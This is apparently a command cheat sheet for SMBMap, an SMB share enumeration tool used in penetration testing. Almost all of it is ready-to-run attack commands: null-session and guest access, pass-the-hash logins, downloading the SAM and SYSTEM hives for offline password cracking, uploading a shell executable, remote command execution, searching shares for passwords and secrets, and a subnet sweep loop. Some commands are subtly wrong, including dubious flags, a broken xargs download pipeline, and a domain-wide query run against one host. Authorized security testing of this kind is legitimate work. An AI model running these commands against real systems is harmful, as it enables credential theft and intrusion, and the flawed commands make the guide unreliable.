SMBMap

Overview

SMBMap is a handy SMB enumeration tool written in Python that allows you to enumerate samba share drives across an entire domain. Useful for SMB security testing and finding sensitive files on Windows networks.

Installation

Linux / macOS

# Via pip (recommended)
pip3 install smbmap

# Via git
git clone https://github.com/ShawnDEvans/smbmap.git
cd smbmap
pip3 install -r requirements.txt
python3 smbmap.py --help

Windows

# Via pip
pip install smbmap

# Or download and run directly
python smbmap.py [options]

Docker

docker run -it --rm smbmap/smbmap:latest smbmap.py --help

Basic Usage

Help and Version

smbmap -h                           # Show help
smbmap --version                    # Show version

Required Parameters

-H, --host <ip>                    # Target host or IP
-u, --username <user>              # Username (optional for null sessions)
-p, --password <pass>              # Password
-d, --domain <domain>              # Domain name

Null Session Enumeration

Enumerate Without Credentials

smbmap -H 192.168.1.100                                    # No auth
smbmap -H 192.168.1.100 -u '' -p ''                      # Null session with explicit empty creds
smbmap -H 192.168.1.100 -u 'anonymous'                   # Anonymous user

Check for Null Session Vulnerability

smbmap -H 192.168.1.100 2>&1 | grep -i "accessible\|readable"

Guest and Unauthenticated Access

smbmap -H 192.168.1.100 -u 'guest' -p ''                 # Guest account
smbmap -H 192.168.1.100 --no-color                       # Disable color output

Authenticated Enumeration

Basic Authentication

smbmap -H 192.168.1.100 -u 'admin' -p 'password123'      # Username/password
smbmap -H 192.168.1.100 -d DOMAIN -u 'admin' -p 'pass'  # With domain

List All Shares

smbmap -H 192.168.1.100 -u 'admin' -p 'password123'      # Shows all accessible shares
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -L          # List only shares (compact)

Check Specific Share

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'C$'     # Enumerate C$ share
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users'  # Enumerate Users share

Share and Permission Enumeration

Share Enumeration Output

smbmap -H 192.168.1.100 -u 'admin' -p 'pass'
# Output shows:
# Share name | Type | Permissions | Comment
# IPC$ | STYPE_IPC | NO ACCESS | (null)
# ADMIN$ | STYPE_DISKTREE | READ, WRITE | Remote Admin
# C$ | STYPE_DISKTREE | NO ACCESS | Default share
# Users | STYPE_DISKTREE | READ | User directory

Identify Writable Shares

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' | grep WRITE

Parse Results for Analysis

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -q          # Quiet mode (minimal output)
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -v          # Verbose output

File Enumeration

Recursive File Listing

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -r
# Recursively list all files in Users share

List Specific Directory

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -r 'Documents'
# List Documents folder recursively

Find Files by Pattern

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -r | grep -i '.txt\|.pdf\|.xls'

File Download and Upload

Download Files

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -D 'Documents/file.txt'
# Download file to current directory

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'C$' -D 'Windows/System32/config/sam'
# Download SAM file (requires admin)

Download Entire Directory

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -r | xargs -I {} \
  smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -D '{}'

Upload Files

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -U 'shell.exe'
# Upload shell.exe to root of Users share

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -U 'shell.exe' -T 'Temp/'
# Upload to specific directory

File Content Search

Search for Keywords in Files

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -r -A 'password\|secret\|api'
# Search recursively for sensitive keywords

Search Specific File Extensions

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -r -A 'password' -F '*.txt\|*.conf'

Output Search Results

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -r -A 'password' -o 'results.txt'

Remote Command Execution

Execute Commands (Requires Admin)

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -x 'ipconfig'
# Execute ipconfig command

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -x 'whoami'
# Check current user context

Execute with Specific Share

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'C$' -x 'cmd.exe /c whoami'
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'ADMIN$' -x 'powershell.exe'

Execute Multiple Commands

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -x 'whoami && hostname && systeminfo'

Pass-the-Hash Attacks

Using NTLM Hash

smbmap -H 192.168.1.100 -u 'admin' -p '8846f7eaee8fb117ad06bdd830b7586c:8846f7eaee8fb117ad06bdd830b7586c'
# Format: LM:NT hash (can be same if only NT available)

PTH with Domain

smbmap -H 192.168.1.100 -d DOMAIN -u 'admin' -p 'hash:hash'

Combine with Command Execution

smbmap -H 192.168.1.100 -u 'admin' -p 'hash:hash' -x 'whoami'

Domain Enumeration

Scan Network Range

for ip in 192.168.1.{1..254}; do
  timeout 2 smbmap -H $ip -u 'guest' -p '' 2>/dev/null | grep -i accessible && echo "Found: $ip"
done

Enumerate All Domain Machines

smbmap -H 192.168.1.1 -u 'admin' -p 'pass' -L | grep -i 'STYPE_DISKTREE' | awk '{print $1}'

Find Printers and Shared Resources

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' | grep -E 'print\|share\|backup'

Common Flags Reference

Flag	Description
-H, --host	Target host IP or hostname
-u, --username	Username for authentication
-p, --password	Password for authentication
-d, --domain	Domain name (for domain users)
-L	List shares only (no file enumeration)
-s, --share	Specify a single share to enumerate
-r	Recursively list directory contents
-A, --search	Search for string in files
-F, --filter	Filter files by extension
-D, --download	Download a file
-U, --upload	Upload a file
-x, --execute	Execute a command (RCE)
-o, --outfile	Output results to file
-q, --quiet	Quiet mode
-v, --verbose	Verbose output
--no-color	Disable colored output

Integration with Other Tools

CrackMapExec Integration

# SMBMap can be chained with CrackMapExec for comprehensive testing
cme smb 192.168.1.0/24 -u admin -p password --shares
# Then use smbmap for deeper enumeration

crackmapexec smb 192.168.1.100 -u admin -p pass -x 'whoami'  # For execution

NetExec (CrackMapExec Successor)

nxc smb 192.168.1.100 -u admin -p pass --shares
# Modern alternative to CrackMapExec

Combine with Enum4linux

enum4linux 192.168.1.100                    # Get user/group info
smbmap -H 192.168.1.100 -u 'user' -p 'pass' # Then enumerate shares

Export to Tools like BloodHound

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -q > shares.txt
# Parse and import share access info into BloodHound for AD analysis

Advanced Techniques

Enumerate Hidden Shares

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -L
# Will show hidden shares ending with $

Find Domain Admin Shares

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -L | grep -i 'admin\|domain\|netlogon\|sysvol'

Backup File Discovery

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -r -A 'backup\|\.bak\|\.sql\|\.db' -F '.*\.(bak|sql|db|backup)$'

Configuration File Search

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -r -A 'password\|api\|secret' -F '.*\.(conf|config|ini|xml|json)$'

Privilege Escalation Path Finding

# Download SYSTEM and SAM files for offline cracking
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'C$' -D 'Windows/System32/config/SYSTEM'
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'C$' -D 'Windows/System32/config/SAM'

Troubleshooting

Connection Refused

# Ensure SMB port 445 is open
nmap -p 445 192.168.1.100

# Try with SMB version specification
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' --smbv2

Authentication Failed

# Verify credentials and domain
smbmap -H 192.168.1.100 -d DOMAIN.COM -u 'DOMAIN\admin' -p 'password'

# Check for account lockout
smbmap -H 192.168.1.100 -u 'admin' -p 'wrongpass' -v

Command Execution Not Working

# Requires appropriate share access (usually C$ or ADMIN$)
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'C$' -x 'whoami'

# May need elevated privileges
smbmap -H 192.168.1.100 -u 'domain\admin' -p 'pass' -x 'whoami'

Timeout Issues

# Increase timeout for slow networks
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -v
# Add verbose flag to see timeout errors

Security Notes

• Always obtain proper authorization before testing SMB shares
• Null sessions may be disabled on modern systems but still worth checking
• Pass-the-hash attacks require NTLM hash of user (not cleartext password)
• Command execution typically requires local admin or system access
• Monitor logs for SMBMap activity (Event ID 4625 for failed logins)
• Use VPN/proxies appropriately for remote engagements
• Credentials should be handled securely (use -p with caution in shell history)

Related Tools

• nmap — Network scanning and SMB enumeration
• enum4linux — Linux-based SMB enumeration
• CrackMapExec — Comprehensive SMB exploitation framework
• NetExec — Modern successor to CrackMapExec
• smbclient — Command-line SMB/CIFS client
• impacket — Python library for SMB protocol manipulation
• Metasploit — Framework with SMB modules